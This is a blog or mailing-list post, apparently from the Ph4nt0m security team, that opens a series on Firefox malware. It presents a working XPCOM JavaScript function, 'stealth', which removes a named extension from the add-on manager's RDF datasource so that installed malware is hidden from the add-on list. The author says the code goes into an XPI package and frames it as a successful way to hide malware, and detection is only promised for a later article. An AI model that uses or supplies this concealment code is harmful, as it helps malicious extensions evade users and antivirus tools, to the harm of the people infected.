I think this is a fun idea to play with, and since it will surely happen in
the mainstream at some point, we might as well talk about it here.

Over the coming time I will be writing a couple of articles about Mozilla
malware: how to write it and how to detect it. In this first article I would
like to show you how to hide already-installed malware in Firefox. Yes, that
can be done pretty easily. Contrary to what many people believe, most
malware, or spyware for that matter, is installed unknowingly by the user.
It doesn't have anything to do with a browser vulnerability. In fact, I've
never seen any malware that relied solely on a vulnerability. The reason is
obvious: vulnerabilities are hard to find and therefore exotic, and the
lifetime of a vulnerability is limited, since it is usually detected quickly
and patched. If a PC is infected there is a high chance that you did it
yourself. Given the computer illiteracy of internet surfers, that is the
reason why surfers are being hacked in the first place. Stop whining, because
it is the truth. So basically you can say that malware writing doesn't have
anything to do with hacking. It's just convincing, or tricking, a surfer into
installing software that the surfer doesn't know about. Really simple.

Now, Firefox allows rich interaction with its extensions. In my opinion it
allows too much. Put more bluntly: it allows full interaction with the
browser and the computer it runs on. While some might think that is an
excellent idea, I think otherwise. What will happen if Firefox becomes an
even more popular browser? Of course attackers will focus more on Firefox.
Personally, I have always thought that a browser would make an excellent
place to plug in malware. Since the web has become the next desktop, it's
easy to imagine where this is going. Moreover, I think there isn't any better
way of defeating AV software than browser malware, because who scans the
Firefox extension folder?

So the first thing we can do is hide the malware from surfers. This example
hides the malware from the Firefox add-on list, which makes it invisible to
enumeration:

function stealth(ext) {
    // The RDF service, a container wrapper, and the extension manager's
    // in-memory datasource, which is what the add-on list is built from.
    var rdf = Components.classes["@mozilla.org/rdf/rdf-service;1"]
        .getService(Components.interfaces.nsIRDFService);
    var container = Components.classes["@mozilla.org/rdf/container;1"]
        .createInstance(Components.interfaces.nsIRDFContainer);
    var ds = Components.classes["@mozilla.org/extensions/manager;1"]
        .getService(Components.interfaces.nsIExtensionManager).datasource;
    var nameArc = rdf.GetResource("http://www.mozilla.org/2004/em-rdf#name");

    // urn:mozilla:item:root is the Seq that holds every installed item.
    container.Init(ds, rdf.GetResource("urn:mozilla:item:root"));

    var items = container.GetElements();
    while (items.hasMoreElements()) {
        var item = items.getNext()
            .QueryInterface(Components.interfaces.nsIRDFResource);
        var name = ds.GetTarget(item, nameArc, true);
        // Items without an em:name literal are skipped instead of letting
        // QueryInterface throw on a null target.
        if (name && name.QueryInterface(Components.interfaces.nsIRDFLiteral)
                .Value == ext) {
            // Removing the item from the root container is all it takes:
            // enumeration (and so the add-on list) no longer sees it.
            container.RemoveElement(item, true);
        }
    }
}

stealth("Extension Name");



That wasn't hard, was it? 

When this function is added to a source file of an XPI installation package,
the extension no longer shows up in the add-on or plugin list, and therefore
we have successfully hidden our malware. Next time I'll talk about how to
write a small extension that can be classified as browser malware, and how
to stay safe or detect it.

 

[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team] <http://blog.ph4nt0m.org/>
Email: [EMAIL PROTECTED]
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#

